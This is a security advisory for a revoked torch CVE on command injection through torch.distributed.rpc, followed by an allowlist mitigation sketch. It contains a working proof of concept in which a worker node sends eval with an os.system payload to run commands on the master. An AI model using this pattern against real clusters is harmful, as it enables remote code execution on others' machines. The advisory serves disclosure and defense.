Arbitrary Command Injection

The advisory has been revoked: it does not affect any version of the package torch.


Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.04% (12th percentile)

  • Snyk ID: SNYK-PYTHON-TORCH-7231127
  • Published: 10 Jun 2024
  • Disclosed: 6 Jun 2024
  • Credit: xbalien

Introduced: 6 Jun 2024

CVE-2024-5480
CWE-77

How to fix?

There is no fixed version for torch.

Amendment

This was deemed not a vulnerability.

Overview

torch is a package that provides tensors and dynamic neural networks in Python with strong GPU acceleration.

Affected versions of this package are vulnerable to Arbitrary Command Injection through the torch.distributed.rpc framework due to missing function validation during RPC calls. An attacker can execute arbitrary commands by leveraging built-in Python functions such as eval during multi-CPU RPC communication.

Note: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.

PoC

Set up a master node and a worker node. Each node needs the following environment variables set to ensure network communication between nodes.

export MASTER_ADDR=10.206.0.3
export MASTER_PORT=29500
export TP_SOCKET_IFNAME=eth0
export GLOO_SOCKET_IFNAME=eth0

On the master (10.206.0.3), enable the RPC service by calling the init_rpc function. The master will then listen on 0.0.0.0:MASTER_PORT, which is used to communicate with each node in the network.

import torch
import torch.distributed.rpc as rpc

def add(a, b):
    return a + b

rpc.init_rpc("master", rank=0, world_size=2)
rpc.shutdown()

On the worker, first, establish the rpc protocol with the master by calling init_rpc. Then, it is possible to communicate with the master through rpc.rpc_sync for RPC function invocations. Due to the lack of security filtering in torch.distributed.rpc, workers can execute built-in Python functions like eval on the master node through RPC, even though these functions are not intentionally provided by the developer. This leads to remote code execution on the master node, potentially causing it to be compromised.

import torch
import torch.distributed.rpc as rpc

rpc.init_rpc("worker", rank=1, world_size=2)
ret = rpc.rpc_sync("master", eval, args=('__import__("os").system("id;ifconfig")',))
print(ret)
rpc.shutdown()

The following torchrun commands start the master and worker separately; alternatively, python3 master.py and python3 worker.py can be executed directly.

For the master:

torchrun --nproc_per_node=1 --nnodes=2 --node_rank=0 --master_addr=10.206.0.3 --master_port=29500 master.py

For the worker:

torchrun --nproc_per_node=1 --nnodes=2 --node_rank=1 --master_addr=10.206.0.3 --master_port=29500 worker.py

As a result, the worker exploited the vulnerability to call built-in Python functions such as eval on the master and execute arbitrary commands like os.system("id;ifconfig"). In the test screenshot, the IP displayed after the command execution is 10.206.0.3, confirming that the command ran on the master.
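Since no fixed version exists, deployments that nonetheless expose torch.distributed.rpc across trust boundaries can apply a defense-in-depth pattern: dispatch RPC targets by name through an explicit allowlist rather than accepting arbitrary callables such as eval. The sketch below is illustrative only and not part of the torch API; the names ALLOWED_FUNCS and safe_dispatch are hypothetical.

```python
# Hypothetical defense-in-depth sketch: resolve RPC targets by name against
# an explicit allowlist, so built-ins like eval can never be dispatched.
# ALLOWED_FUNCS and safe_dispatch are illustrative names, not torch APIs.

def add(a, b):
    return a + b

# Only functions the developer intentionally exposes appear here.
ALLOWED_FUNCS = {"add": add}

def safe_dispatch(func_name, *args):
    """Look up the target by name; reject anything not explicitly allowed."""
    func = ALLOWED_FUNCS.get(func_name)
    if func is None:
        raise PermissionError(f"RPC target not allowed: {func_name!r}")
    return func(*args)
```

With this pattern, the worker sends a string such as "add" instead of a callable, and a request naming "eval" is rejected before anything is invoked.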